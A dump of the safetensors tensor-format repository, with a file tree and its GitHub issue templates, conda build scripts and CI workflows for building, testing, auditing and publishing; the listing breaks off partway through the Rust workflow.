├── .dockerignore
├── .github
├── ISSUE_TEMPLATE
│ ├── bug-report.yml
│ ├── config.yml
│ └── feature-request.yml
├── PULL_REQUEST_TEMPLATE.md
├── conda
│ ├── bld.bat
│ ├── build.sh
│ └── meta.yaml
├── stale.yml
└── workflows
│ ├── build_documentation.yml
│ ├── build_pr_documentation.yml
│ ├── codecov.yml
│ ├── delete_doc_comment.yml
│ ├── delete_doc_comment_trigger.yml
│ ├── python-bench.yml
│ ├── python-release-conda.yml
│ ├── python-release.yml
│ ├── python.yml
│ ├── rust-release.yml
│ ├── rust.yml
│ ├── stale.yml
│ ├── trufflehog.yml
│ └── upload_pr_documentation.yml
├── .gitignore
├── .pre-commit-config.yaml
├── Dockerfile.s390x.test
├── LICENSE
├── Makefile
├── README.md
├── RELEASE.md
├── attacks
├── README.md
├── numpy_dos_create.py
├── numpy_dos_get_pwned.py
├── paddle_ace_create.py
├── paddle_ace_get_pwned.py
├── safetensors_abuse_attempt_1.py
├── safetensors_abuse_attempt_2.py
├── safetensors_abuse_attempt_3.py
├── tf_ace_create.py
├── tf_ace_get_pwned.py
├── tf_safe_ace_create.py
├── tf_safe_ace_get_pwned.py
├── torch_ace_create.py
├── torch_ace_get_pwned.py
├── torch_dos_create.py
└── torch_dos_get_pwned.py
├── bindings
└── python
│ ├── .gitignore
│ ├── Cargo.toml
│ ├── LICENSE
│ ├── MANIFEST.in
│ ├── Makefile
│ ├── README.md
│ ├── benches
│ ├── test_flax.py
│ ├── test_mlx.py
│ ├── test_paddle.py
│ ├── test_pt.py
│ └── test_tf.py
│ ├── convert.py
│ ├── convert_all.py
│ ├── fuzz.py
│ ├── py_src
│ └── safetensors
│ │ ├── __init__.py
│ │ ├── __init__.pyi
│ │ ├── flax.py
│ │ ├── mlx.py
│ │ ├── numpy.py
│ │ ├── paddle.py
│ │ ├── py.typed
│ │ ├── tensorflow.py
│ │ └── torch.py
│ ├── pyproject.toml
│ ├── setup.cfg
│ ├── src
│ └── lib.rs
│ ├── stub.py
│ ├── tests
│ ├── data
│ │ └── __init__.py
│ ├── test_flax_comparison.py
│ ├── test_mlx_comparison.py
│ ├── test_paddle_comparison.py
│ ├── test_pt_comparison.py
│ ├── test_pt_model.py
│ ├── test_simple.py
│ └── test_tf_comparison.py
│ └── uv.lock
├── codecov.yaml
├── codecov.yml
├── docs
├── safetensors.schema.json
└── source
│ ├── _toctree.yml
│ ├── api
│ ├── flax.mdx
│ ├── numpy.mdx
│ ├── paddle.mdx
│ ├── tensorflow.mdx
│ └── torch.mdx
│ ├── convert-weights.md
│ ├── index.mdx
│ ├── metadata_parsing.mdx
│ ├── speed.mdx
│ └── torch_shared_tensors.mdx
├── flake.lock
├── flake.nix
└── safetensors
├── Cargo.toml
├── LICENSE
├── README.md
├── benches
└── benchmark.rs
├── fuzz
├── .gitignore
├── Cargo.toml
└── fuzz_targets
│ └── fuzz_target_1.rs
└── src
├── lib.rs
├── slice.rs
└── tensor.rs
/.dockerignore:
--------------------------------------------------------------------------------
1 | safetensors/target
2 | bindings/python/target
3 | Dockerfile.s390x.test
4 |
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/bug-report.yml:
--------------------------------------------------------------------------------
1 | name: "\U0001F41B Bug Report"
2 | description: Submit a bug report to help us improve safetensors
3 | body:
4 | - type: textarea
5 | id: system-info
6 | attributes:
7 | label: System Info
8 | description: Please share your system info with us. You can run the command `transformers-cli env` and copy-paste its output below.
9 | placeholder: safetensors version, platform, python version, ...
10 | validations:
11 | required: true
12 |
13 | # - type: textarea
14 | # id: who-can-help
15 | # attributes:
16 | # label: Who can help?
17 | # description: |
18 | # Your issue will be replied to more quickly if you can figure out the right person to tag with @
19 | # If you know how to use git blame, that is the easiest way, otherwise, here is a rough guide of **who to tag**.
20 | #
21 | # All issues are read by one of the core maintainers, so if you don't know who to tag, just leave this blank and
22 | # a core maintainer will ping the right person.
23 | #
24 | # Please tag fewer than 3 people.
25 | #
26 | # Models:
27 |
28 | # - text models: @ArthurZucker and @younesbelkada
29 | # - vision models: @amyeroberts
30 | # - speech models: @sanchit-gandhi
31 | # - graph models: @clefourrier
32 | #
33 | # Library:
34 | #
35 | # - flax: @sanchit-gandhi
36 | # - generate: @gante
37 | # - pipelines: @Narsil
38 | # - tensorflow: @gante and @Rocketknight1
39 | # - tokenizers: @ArthurZucker
40 | # - trainer: @sgugger
41 | #
42 | # Integrations:
43 | #
44 | # - deepspeed: HF Trainer: @stas00, Accelerate: @pacman100
45 | # - ray/raytune: @richardliaw, @amogkam
46 | # - Big Model Inference: @sgugger @muellerzr
47 | #
48 | # Documentation: @sgugger, @stevhliu and @MKhalusova
49 | #
50 | # Model hub:
51 |
52 | # - for issues with a model, report at https://discuss.huggingface.co/ and tag the model's creator.
53 | #
54 | # HF projects:
55 | #
56 | # - accelerate: [different repo](https://github.com/huggingface/accelerate)
57 | # - datasets: [different repo](https://github.com/huggingface/datasets)
58 | # - diffusers: [different repo](https://github.com/huggingface/diffusers)
59 | # - rust tokenizers: [different repo](https://github.com/huggingface/tokenizers)
60 | #
61 | # Maintained examples (not research project or legacy):
62 | #
63 | # - Flax: @sanchit-gandhi
64 | # - PyTorch: @sgugger
65 | # - TensorFlow: @Rocketknight1
66 |
67 | # Research projects are not maintained and should be taken as is.
68 |
69 | # placeholder: "@Username ..."
70 |
71 | - type: checkboxes
72 | id: information-scripts-examples
73 | attributes:
74 | label: Information
75 | description: 'The problem arises when using:'
76 | options:
77 | - label: "The official example scripts"
78 | - label: "My own modified scripts"
79 |
80 | - type: textarea
81 | id: reproduction
82 | validations:
83 | required: true
84 | attributes:
85 | label: Reproduction
86 | description: |
87 | Please provide a code sample that reproduces the problem you ran into. It can be a Colab link or just a code snippet.
88 | If you have code snippets, error messages, stack traces please provide them here as well.
89 | Important! Use code tags to correctly format your code. See https://help.github.com/en/github/writing-on-github/creating-and-highlighting-code-blocks#syntax-highlighting
90 | Do not use screenshots, as they are hard to read and (more importantly) don't allow others to copy-and-paste your code.
91 |
92 | placeholder: |
93 | Steps to reproduce the behavior:
94 |
95 | 1.
96 | 2.
97 | 3.
98 |
99 |
100 | - type: textarea
101 | id: expected-behavior
102 | validations:
103 | required: true
104 | attributes:
105 | label: Expected behavior
106 | description: "A clear and concise description of what you would expect to happen."
107 |
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/config.yml:
--------------------------------------------------------------------------------
1 | blank_issues_enabled: true
2 | version: 2.1
3 |
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/feature-request.yml:
--------------------------------------------------------------------------------
1 | name: "\U0001F680 Feature request"
2 | description: Submit a proposal/request for a new safetensors feature
3 | labels: [ "feature" ]
4 | body:
5 | - type: textarea
6 | id: feature-request
7 | validations:
8 | required: true
9 | attributes:
10 | label: Feature request
11 | description: |
12 | A clear and concise description of the feature proposal. Please provide a link to the paper and code in case they exist.
13 |
14 | - type: textarea
15 | id: motivation
16 | validations:
17 | required: true
18 | attributes:
19 | label: Motivation
20 | description: |
21 | Please outline the motivation for the proposal. Is your feature request related to a problem? e.g., I'm always frustrated when [...]. If this is related to another GitHub issue, please link here too.
22 |
23 |
24 | - type: textarea
25 | id: contribution
26 | validations:
27 | required: true
28 | attributes:
29 | label: Your contribution
30 | description: |
31 | Is there any way that you could help, e.g. by submitting a PR? Make sure to read the CONTRIBUTING.MD [readme](https://github.com/huggingface/safetensors/blob/main/CONTRIBUTING.md)
32 |
--------------------------------------------------------------------------------
/.github/PULL_REQUEST_TEMPLATE.md:
--------------------------------------------------------------------------------
1 | # What does this PR do?
2 |
3 |
12 |
13 |
14 |
15 | Fixes # (issue) or description of the problem this PR solves.
16 |
--------------------------------------------------------------------------------
/.github/conda/bld.bat:
--------------------------------------------------------------------------------
1 | cd bindings\python
2 | %PYTHON% -m pip install . --prefix=%PREFIX%
3 |
--------------------------------------------------------------------------------
/.github/conda/build.sh:
--------------------------------------------------------------------------------
1 | cd bindings/python
2 | $PYTHON -m pip install . --prefix=$PREFIX
3 |
--------------------------------------------------------------------------------
/.github/conda/meta.yaml:
--------------------------------------------------------------------------------
1 | {% set name = "safetensors" %}
2 |
3 | package:
4 | name: "{{ name|lower }}"
5 | version: "{{ SAFETENSORS_VERSION }}"
6 |
7 | source:
8 | path: ../../
9 |
10 | requirements:
11 | host:
12 | - pip
13 | - python x.x
14 | - setuptools
15 | - setuptools-rust
16 | - maturin
17 |
18 | run:
19 | - python x.x
20 |
21 | test:
22 | imports:
23 | - safetensors
24 |
25 | about:
26 | home: https://huggingface.co/docs/safetensors
27 | license: Apache License 2.0
28 | license_file: LICENSE
29 | summary: "Safe and portable way of storing tensors"
30 |
--------------------------------------------------------------------------------
/.github/stale.yml:
--------------------------------------------------------------------------------
1 | # Number of days of inactivity before an issue becomes stale
2 | daysUntilStale: 60
3 | # Number of days of inactivity before a stale issue is closed
4 | daysUntilClose: 7
5 | # Issues with these labels will never be considered stale
6 | exemptLabels:
7 | - pinned
8 | - security
9 | # Label to use when marking an issue as stale
10 | staleLabel: wontfix
11 | # Comment to post when marking an issue as stale. Set to `false` to disable
12 | markComment: >
13 | This issue has been automatically marked as stale because it has not had
14 | recent activity. It will be closed if no further activity occurs. Thank you
15 | for your contributions.
16 | # Comment to post when closing a stale issue. Set to `false` to disable
17 | closeComment: false
18 |
--------------------------------------------------------------------------------
/.github/workflows/build_documentation.yml:
--------------------------------------------------------------------------------
1 | name: Build documentation
2 |
3 | on:
4 | push:
5 | branches:
6 | - main
7 | - doc-builder*
8 | - v*-release
9 | - use_templates
10 |
11 | jobs:
12 | build:
13 | uses: huggingface/doc-builder/.github/workflows/build_main_documentation.yml@main
14 | with:
15 | commit_sha: ${{ github.sha }}
16 | package: safetensors
17 | notebook_folder: safetensors_doc
18 | package_path: safetensors/bindings/python/
19 | version_tag_suffix: bindings/python/py_src/
20 | install_rust: true
21 | custom_container: huggingface/transformers-doc-builder
22 | secrets:
23 | token: ${{ secrets.HUGGINGFACE_PUSH }}
24 | hf_token: ${{ secrets.HF_DOC_BUILD_PUSH }}
25 |
--------------------------------------------------------------------------------
/.github/workflows/build_pr_documentation.yml:
--------------------------------------------------------------------------------
1 | name: Build PR Documentation
2 |
3 | on:
4 | pull_request:
5 | paths:
6 | - "docs/**"
7 | - "bindings/python/py_src/**"
8 | - ".github/workflows/build_pr_documentation.yml"
9 |
10 | concurrency:
11 | group: ${{ github.workflow }}-${{ github.head_ref || github.run_id }}
12 | cancel-in-progress: true
13 |
14 | jobs:
15 | build:
16 | uses: huggingface/doc-builder/.github/workflows/build_pr_documentation.yml@main
17 | with:
18 | commit_sha: ${{ github.event.pull_request.head.sha }}
19 | pr_number: ${{ github.event.number }}
20 | package: safetensors
21 | package_path: safetensors/bindings/python/
22 | version_tag_suffix: bindings/python/py_src/
23 | install_rust: true
24 | custom_container: huggingface/transformers-doc-builder
25 |
--------------------------------------------------------------------------------
/.github/workflows/codecov.yml:
--------------------------------------------------------------------------------
1 | name: Code coverage
2 | on:
3 | push:
4 | branches:
5 | - main
6 |
7 | jobs:
8 | build:
9 | runs-on: ubuntu-latest
10 | defaults:
11 | run:
12 | working-directory: ./safetensors
13 |
14 | steps:
15 | - uses: actions/checkout@v3
16 |
17 | - name: Install Rust Stable
18 | uses: actions-rs/toolchain@v1
19 | with:
20 | toolchain: stable
21 | components: llvm-tools-preview
22 | override: true
23 |
24 | - uses: Swatinem/rust-cache@v2
25 |
26 | - name: Install cargo-llvm-cov for Ubuntu
27 | run: cargo install cargo-llvm-cov
28 |
29 | - name: Coverage report
30 | run: cargo llvm-cov --release --lcov --output-path lcov.info
31 |
32 | - name: Upload to codecov.io
33 | uses: codecov/codecov-action@v3
34 | with:
35 | token: ${{ secrets.CODECOV_TOKEN }} # not required for public repos
36 | working-directory: ./safetensors
37 | fail_ci_if_error: true
38 |
--------------------------------------------------------------------------------
/.github/workflows/delete_doc_comment.yml:
--------------------------------------------------------------------------------
1 | name: Delete doc comment
2 |
3 | on:
4 | workflow_run:
5 | workflows: ["Delete doc comment trigger"]
6 | types:
7 | - completed
8 |
9 | jobs:
10 | delete:
11 | uses: huggingface/doc-builder/.github/workflows/delete_doc_comment.yml@main
12 | secrets:
13 | comment_bot_token: ${{ secrets.COMMENT_BOT_TOKEN }}
--------------------------------------------------------------------------------
/.github/workflows/delete_doc_comment_trigger.yml:
--------------------------------------------------------------------------------
1 | name: Delete doc comment trigger
2 |
3 | on:
4 | pull_request:
5 | types: [ closed ]
6 |
7 | jobs:
8 | delete:
9 | uses: huggingface/doc-builder/.github/workflows/delete_doc_comment_trigger.yml@main
10 | with:
11 | pr_number: ${{ github.event.number }}
--------------------------------------------------------------------------------
/.github/workflows/python-bench.yml:
--------------------------------------------------------------------------------
1 | name: Simple benchmarks
2 | on:
3 | push:
4 | branches:
5 | - main
6 | pull_request:
7 |
8 |
9 | permissions:
10 | # deployments permission to deploy GitHub pages website
11 | deployments: write
12 | # contents permission to update benchmark contents in gh-pages branch
13 | contents: write
14 |
15 | jobs:
16 | benchmark:
17 | name: Performance regression check
18 | runs-on: ubuntu-latest
19 | steps:
20 | - uses: actions/checkout@v4
21 | - name: Install Rust
22 | uses: actions-rs/toolchain@v1
23 | with:
24 | toolchain: stable
25 | components: rustfmt, clippy
26 |
27 | - name: Install Python
28 | uses: actions/setup-python@v4
29 | with:
30 | python-version: "3.12"
31 | architecture: "x64"
32 |
33 | - name: Install
34 | working-directory: ./bindings/python
35 | run: |
36 | pip install -U pip uv
37 | uv sync --extra dev
38 |
39 | - name: Run tests
40 | working-directory: ./bindings/python
41 | run: |
42 | cargo test
43 | uv run pytest --benchmark-json output.json benches/
44 | # Download previous benchmark result from cache (if exists)
45 | - name: Download previous benchmark data
46 | uses: actions/cache@v4
47 | with:
48 | path: ./cache
49 | key: ${{ runner.os }}-benchmark
50 | # Run `github-action-benchmark` action
51 | - name: Store benchmark result
52 | uses: benchmark-action/github-action-benchmark@v1
53 | with:
54 | # What benchmark tool the output.txt came from
55 | tool: 'pytest'
56 | # Where the output from the benchmark tool is stored
57 | output-file-path: ./bindings/python/output.json
58 | github-token: ${{ secrets.GITHUB_TOKEN }}
59 | # Push and deploy GitHub pages branch automatically
60 | auto-push: true
61 | comment-on-alert: true
62 | # Mention @rhysd in the commit comment
63 | alert-comment-cc-users: '@Narsil'
64 |
--------------------------------------------------------------------------------
/.github/workflows/python-release-conda.yml:
--------------------------------------------------------------------------------
1 | name: Python Release - Conda
2 |
3 | on:
4 | push:
5 | tags:
6 | - v*
7 |
8 | env:
9 | ANACONDA_API_TOKEN: ${{ secrets.ANACONDA_API_TOKEN }}
10 |
11 | jobs:
12 | build_and_package:
13 | runs-on: ${{ matrix.os }}
14 | strategy:
15 | matrix:
16 | os: [windows-latest, macos-latest]
17 | # 3.11 not available on Conda yet.
18 | python: ["3.8", "3.9", "3.10", "3.11"]
19 |
20 | steps:
21 | - name: Checkout repository
22 | uses: actions/checkout@v3
23 |
24 | - name: Install miniconda
25 | uses: conda-incubator/setup-miniconda@v2
26 | with:
27 | auto-update-conda: true
28 | python-version: ${{ matrix.python }}
29 |
30 | - name: Conda info
31 | shell: bash -l {0}
32 | run: conda info
33 |
34 | - name: Install Rust
35 | uses: actions-rs/toolchain@v1
36 | with:
37 | toolchain: stable
38 |
39 | - name: Setup conda env
40 | shell: bash -l {0}
41 | run: |
42 | conda install setuptools-rust
43 | conda install -c defaults anaconda-client conda-build
44 |
45 | - name: Extract version
46 | shell: bash -l {0}
47 | working-directory: ./bindings/python
48 | run: echo "SAFETENSORS_VERSION=`grep -m 1 version Cargo.toml | grep -e '".*"' -o | tr -d '"' | sed s/-/./ `" >> $GITHUB_ENV
49 |
50 | - name: Build conda packages
51 | shell: bash -l {0}
52 | run: |
53 | conda info
54 | conda list
55 | conda-build .github/conda --python=${{ matrix.python }}
56 |
57 | - name: Upload to Anaconda
58 | shell: bash -l {0}
59 | run: |
60 | anaconda upload `conda-build .github/conda --output` --force
61 |
62 | build_and_package_linux:
63 | runs-on: ubuntu-latest
64 | container: quay.io/pypa/manylinux2014_x86_64
65 |
66 | strategy:
67 | fail-fast: false
68 | matrix:
69 | python: [38, 39, 310, 311]
70 | include:
71 | - python: 38
72 | checksum: e2a4438671e0e42c5bba14cb51de6ce9763938184d6ca2967340bbe972bbe7e6
73 | - python: 39
74 | checksum: 9829d95f639bd0053b2ed06d1204e60644617bf37dd5cc57523732e0e8d64516
75 | - python: 310
76 | checksum: ea5e6e8a3d5a0247b9df85382d27220fac8e59b5778fd313c5913879cd9baafc
77 | - python: 311
78 | checksum: 634d76df5e489c44ade4085552b97bebc786d49245ed1a830022b0b406de5817
79 |
80 | steps:
81 | - name: Checkout repository
82 | uses: actions/checkout@v2
83 |
84 | - name: Install miniconda
85 | run: |
86 | yum install -y wget openssl-devel
87 | export FILENAME=Miniconda3-py${{ matrix.python }}_23.5.2-0-Linux-x86_64.sh
88 | wget https://repo.anaconda.com/miniconda/$FILENAME
89 | sha256sum $FILENAME | awk '$1=="${{ matrix.checksum}}"{print"good to go"}'
90 | bash $FILENAME -b -p $HOME/miniconda
91 | source $HOME/miniconda/bin/activate
92 |
93 | - name: Show glibc information
94 | shell: bash -l {0}
95 | run: ldd --version
96 |
97 | - name: Conda info
98 | shell: bash -l {0}
99 | run: |
100 | source $HOME/miniconda/bin/activate
101 | conda info
102 |
103 | - name: Install Rust
104 | uses: actions-rs/toolchain@v1
105 | with:
106 | toolchain: stable
107 |
108 | - name: Setup conda env
109 | shell: bash -l {0}
110 | run: |
111 | source $HOME/miniconda/bin/activate
112 | conda install setuptools-rust
113 | conda install -c defaults anaconda-client conda-build
114 |
115 | - name: Extract version
116 | shell: bash -l {0}
117 | working-directory: ./bindings/python
118 | run: |
119 | source $HOME/miniconda/bin/activate
120 | echo "SAFETENSORS_VERSION=`grep -m 1 version Cargo.toml | grep -e '".*"' -o | tr -d '"' | sed s/-/./ `" >> $GITHUB_ENV
121 |
122 | - name: Build conda packages
123 | shell: bash -l {0}
124 | run: |
125 | source $HOME/miniconda/bin/activate
126 | conda info
127 | conda list
128 | conda-build .github/conda --python=${{ matrix.python }}
129 |
130 | - name: Upload to Anaconda
131 | shell: bash -l {0}
132 | run: |
133 | source $HOME/miniconda/bin/activate
134 | anaconda upload `conda-build .github/conda --output` --force
135 |
--------------------------------------------------------------------------------
/.github/workflows/python-release.yml:
--------------------------------------------------------------------------------
1 | # This file is autogenerated by maturin v1.7.4
2 | # To update, run
3 | #
4 | # maturin generate-ci github -m bindings/python/Cargo.toml
5 | #
6 | name: CI
7 |
8 | on:
9 | push:
10 | branches:
11 | - main
12 | - master
13 | tags:
14 | - '*'
15 | pull_request:
16 | workflow_dispatch:
17 |
18 | permissions:
19 | contents: read
20 |
21 | jobs:
22 | linux:
23 | runs-on: ${{ matrix.platform.runner }}
24 | strategy:
25 | matrix:
26 | platform:
27 | - runner: ubuntu-latest
28 | target: x86_64
29 | - runner: ubuntu-latest
30 | target: x86
31 | - runner: ubuntu-latest
32 | target: aarch64
33 | - runner: ubuntu-latest
34 | target: armv7
35 | - runner: ubuntu-latest
36 | target: s390x
37 | - runner: ubuntu-latest
38 | target: ppc64le
39 | steps:
40 | - uses: actions/checkout@v4
41 | - uses: actions/setup-python@v5
42 | with:
43 | python-version: 3.x
44 | - name: Build wheels
45 | uses: PyO3/maturin-action@v1
46 | with:
47 | target: ${{ matrix.platform.target }}
48 | args: --release --out dist --manifest-path bindings/python/Cargo.toml
49 | sccache: 'true'
50 | manylinux: auto
51 | - name: Upload wheels
52 | uses: actions/upload-artifact@v4
53 | with:
54 | name: wheels-linux-${{ matrix.platform.target }}
55 | path: dist
56 |
57 | musllinux:
58 | runs-on: ${{ matrix.platform.runner }}
59 | strategy:
60 | matrix:
61 | platform:
62 | - runner: ubuntu-latest
63 | target: x86_64
64 | - runner: ubuntu-latest
65 | target: x86
66 | - runner: ubuntu-latest
67 | target: aarch64
68 | - runner: ubuntu-latest
69 | target: armv7
70 | steps:
71 | - uses: actions/checkout@v4
72 | - uses: actions/setup-python@v5
73 | with:
74 | python-version: 3.x
75 | - name: Build wheels
76 | uses: PyO3/maturin-action@v1
77 | with:
78 | target: ${{ matrix.platform.target }}
79 | args: --release --out dist --manifest-path bindings/python/Cargo.toml
80 | sccache: 'true'
81 | manylinux: musllinux_1_2
82 | - name: Upload wheels
83 | uses: actions/upload-artifact@v4
84 | with:
85 | name: wheels-musllinux-${{ matrix.platform.target }}
86 | path: dist
87 |
88 | windows:
89 | runs-on: ${{ matrix.platform.runner }}
90 | strategy:
91 | matrix:
92 | platform:
93 | - runner: windows-latest
94 | target: x64
95 | - runner: windows-latest
96 | target: x86
97 | steps:
98 | - uses: actions/checkout@v4
99 | - uses: actions/setup-python@v5
100 | with:
101 | python-version: 3.x
102 | architecture: ${{ matrix.platform.target }}
103 | - name: Build wheels
104 | uses: PyO3/maturin-action@v1
105 | with:
106 | target: ${{ matrix.platform.target }}
107 | args: --release --out dist --manifest-path bindings/python/Cargo.toml
108 | sccache: 'true'
109 | - name: Upload wheels
110 | uses: actions/upload-artifact@v4
111 | with:
112 | name: wheels-windows-${{ matrix.platform.target }}
113 | path: dist
114 |
115 | macos:
116 | runs-on: ${{ matrix.platform.runner }}
117 | strategy:
118 | matrix:
119 | platform:
120 | - runner: macos-13
121 | target: x86_64
122 | - runner: macos-14
123 | target: aarch64
124 | steps:
125 | - uses: actions/checkout@v4
126 | - uses: actions/setup-python@v5
127 | with:
128 | python-version: 3.x
129 | - name: Build wheels
130 | uses: PyO3/maturin-action@v1
131 | with:
132 | target: ${{ matrix.platform.target }}
133 | args: --release --out dist --manifest-path bindings/python/Cargo.toml
134 | sccache: 'true'
135 | - name: Upload wheels
136 | uses: actions/upload-artifact@v4
137 | with:
138 | name: wheels-macos-${{ matrix.platform.target }}
139 | path: dist
140 |
141 | sdist:
142 | runs-on: ubuntu-latest
143 | steps:
144 | - uses: actions/checkout@v4
145 | - name: Build sdist
146 | uses: PyO3/maturin-action@v1
147 | with:
148 | command: sdist
149 | args: --out dist --manifest-path bindings/python/Cargo.toml
150 | - name: Upload sdist
151 | uses: actions/upload-artifact@v4
152 | with:
153 | name: wheels-sdist
154 | path: dist
155 |
156 | release:
157 | name: Release
158 | runs-on: ubuntu-latest
159 | if: ${{ startsWith(github.ref, 'refs/tags/') || github.event_name == 'workflow_dispatch' }}
160 | needs: [linux, musllinux, windows, macos, sdist]
161 | permissions:
162 | # Use to sign the release artifacts
163 | id-token: write
164 | # Used to upload release artifacts
165 | contents: write
166 | # Used to generate artifact attestation
167 | attestations: write
168 | steps:
169 | - uses: actions/download-artifact@v4
170 | - name: Generate artifact attestation
171 | uses: actions/attest-build-provenance@v1
172 | with:
173 | subject-path: 'wheels-*/*'
174 | - name: Publish to PyPI
175 | if: "startsWith(github.ref, 'refs/tags/')"
176 | uses: PyO3/maturin-action@v1
177 | env:
178 | MATURIN_PYPI_TOKEN: ${{ secrets.PYPI_TOKEN_DIST}}
179 | with:
180 | command: upload
181 | args: --non-interactive --skip-existing wheels-*/*
182 |
--------------------------------------------------------------------------------
/.github/workflows/python.yml:
--------------------------------------------------------------------------------
1 | name: Python
2 |
3 | on:
4 | pull_request:
5 |
6 | jobs:
7 | build_and_test:
8 | name: Check everything builds & tests
9 | runs-on: ${{ matrix.os }}
10 | strategy:
11 | matrix:
12 | os: [ubuntu-latest, macos-13, windows-latest]
13 | # Lowest and highest, no version specified so that
14 | # new releases get automatically tested against
15 | version: [{torch: torch==1.10, python: "3.9", arch: "x64"}, {torch: torch, python: "3.12", arch: "x64"}]
16 | # TODO this would include macos ARM target.
17 | # however jax has an illegal instruction issue
18 | # that exists only in CI (probably difference in instruction support).
19 | # include:
20 | # - os: macos-latest
21 | # version:
22 | # torch: torch
23 | # python: "3.11"
24 | include:
25 | - os: ubuntu-latest
26 | version:
27 | torch: torch
28 | python: "3.13"
29 | arch: "x64-freethreaded"
30 | defaults:
31 | run:
32 | working-directory: ./bindings/python
33 | steps:
34 | - name: Checkout repository
35 | uses: actions/checkout@v3
36 |
37 |
38 | - name: Install Rust
39 | uses: actions-rs/toolchain@v1
40 | with:
41 | toolchain: stable
42 | components: rustfmt, clippy
43 |
44 | - name: Cargo install audit
45 | run: cargo install cargo-audit
46 |
47 | - uses: Swatinem/rust-cache@v2
48 | with:
49 | workspaces: "bindings/python"
50 |
51 | - name: Install Python
52 | uses: actions/setup-python@v5
53 | with:
54 | python-version: ${{ matrix.version.python }}
55 | architecture: ${{ matrix.version.arch }}
56 |
57 | - name: Lint with RustFmt
58 | run: cargo fmt -- --check
59 |
60 | - name: Lint with Clippy
61 | run: cargo clippy --all-targets --all-features -- -D warnings
62 |
63 | - name: Run Audit
64 | run: cargo audit -D warnings
65 |
66 | - name: Install
67 | run: |
68 | pip install -U pip
69 | pip install .[numpy]
70 |
71 | - name: Install (torch)
72 | if: matrix.version.arch != 'x64-freethreaded'
73 | run: |
74 | pip install ${{ matrix.version.torch }}
75 | shell: bash
76 |
77 | - name: Install (torch freethreaded)
78 | if: matrix.version.arch == 'x64-freethreaded'
79 | run: |
80 | pip install ${{ matrix.version.torch }} --index-url https://download.pytorch.org/whl/cu126
81 | shell: bash
82 |
83 | - name: Install (tensorflow)
84 | if: matrix.version.arch != 'x64-freethreaded'
85 | run: |
86 | pip install .[tensorflow]
87 | shell: bash
88 |
89 | - name: Install (jax, flax)
90 | if: matrix.os != 'windows-latest' && matrix.version.arch != "x64-freethreaded"
91 | run:
92 | pip install .[jax]
93 | shell: bash
94 |
95 | - name: Install (mlx)
96 | if: matrix.os == 'macos-latest'
97 | run: |
98 | pip install .[mlx]
99 | shell: bash
100 |
101 | - name: Check style
102 | run: |
103 | pip install .[quality]
104 | black --check --line-length 119 --target-version py35 py_src/safetensors tests
105 |
106 | - name: Run tests
107 | run: |
108 | cargo test
109 | pip install .[testing]
110 | pytest -sv tests/
111 |
112 | test_s390x_big_endian:
113 | runs-on: ubuntu-latest
114 | permissions:
115 | contents: write
116 | packages: write
117 | name: Test bigendian - S390X
118 | steps:
119 | - uses: actions/checkout@v2
120 | - name: Set up QEMU
121 | uses: docker/setup-qemu-action@v2
122 | - name: Set up Docker Buildx
123 | uses: docker/setup-buildx-action@v2
124 | - name: Set short sha
125 | id: vars
126 | run: echo "GITHUB_SHA_SHORT=$(git rev-parse --short HEAD)" >> $GITHUB_ENV
127 | - name: Docker meta
128 | id: meta
129 | uses: docker/metadata-action@v4
130 | with:
131 | # list of Docker images to use as base name for tags
132 | images: |
133 | ghcr.io/huggingface/safetensors/s390x
134 | # generate Docker tags based on the following events/attributes
135 | tags: |
136 | type=schedule
137 | type=ref,event=branch
138 | type=ref,event=pr
139 | type=semver,pattern={{version}}
140 | type=semver,pattern={{major}}.{{minor}}
141 | type=semver,pattern={{major}}
142 | type=sha
143 | - name: Login to Registry
144 | uses: docker/login-action@v3
145 | with:
146 | registry: ghcr.io
147 | username: ${{ github.actor }}
148 | password: ${{ secrets.GITHUB_TOKEN }}
149 | - name: Test big endian
150 | uses: docker/build-push-action@v4
151 | with:
152 | platforms: linux/s390x
153 | file: Dockerfile.s390x.test
154 | tags: ${{ steps.meta.outputs.tags }}
155 | labels: ${{ steps.meta.outputs.labels }}
156 | cache-from: type=registry,ref=ghcr.io/huggingface/safetensors/s390x:cache,mode=max
157 | cache-to: type=registry,ref=ghcr.io/huggingface/safetensors/s390x:cache,mode=max
158 |
--------------------------------------------------------------------------------
/.github/workflows/rust-release.yml:
--------------------------------------------------------------------------------
1 | name: Rust Release
2 |
3 | env:
4 | CRATES_TOKEN: ${{ secrets.CRATES_TOKEN }}
5 |
6 | on:
7 | push:
8 | tags:
9 | - v*
10 |
11 | jobs:
12 | rust_publish:
13 | runs-on: ubuntu-latest
14 | steps:
15 | - name: Checkout repository
16 | uses: actions/checkout@v3
17 |
18 | - name: Install Rust
19 | uses: actions-rs/toolchain@v1
20 | with:
21 | toolchain: stable
22 |
23 | - name: Cache Cargo Registry
24 | uses: actions/cache@v1
25 | with:
26 | path: ~/.cargo/registry
27 | key: ubuntu-latest-cargo-registry-${{ hashFiles('**/Cargo.toml') }}
28 |
29 | - name: Publish package rust
30 | if: ${{ !contains(github.ref, 'rc') }}
31 | working-directory: ./safetensors
32 | run: cargo publish --token ${CRATES_TOKEN}
33 |
34 |
--------------------------------------------------------------------------------
/.github/workflows/rust.yml:
--------------------------------------------------------------------------------
1 | name: Rust
2 |
3 | on:
4 | pull_request:
5 |
6 | jobs:
7 | build:
8 | runs-on: ${{ matrix.os }}
9 | strategy:
10 | matrix:
11 | os: [ubuntu-latest, windows-latest, macOS-latest]
12 | toolchain: [stable]
13 | include:
14 | - os: ubuntu-latest
15 | toolchain: "1.74"
16 | defaults:
17 | run:
18 | working-directory: ./safetensors
19 |
20 | steps:
21 | - uses: actions/checkout@v3
22 |
23 | - name: Install Rust Stable
24 | uses: actions-rs/toolchain@v1
25 | with:
26 | toolchain: stable
27 | components: rustfmt, clippy, llvm-tools-preview
28 | override: true
29 |
30 | - uses: Swatinem/rust-cache@v2
31 |
32 | - name: Install cargo-audit
33 | run: cargo install cargo-audit
34 |
35 | - name: Install cargo-llvm-cov for Ubuntu
36 | if: matrix.os == 'ubuntu-latest'
37 | run: cargo install cargo-llvm-cov
38 |
39 | - name: Build
40 | run: cargo build --all-targets --verbose
41 |
42 | - name: Lint with Clippy
43 | run: cargo clippy --all-targets -- -D warnings
44 |
45 | - name: Run Tests
46 | run: cargo test --verbose
47 |
48 | - name: Run No-STD Tests
49 | run: cargo test --no-default-features --features alloc --verbose
50 |
51 | - name: Run Audit
52 | # RUSTSEC-2021-0145 is criterion so only within benchmarks
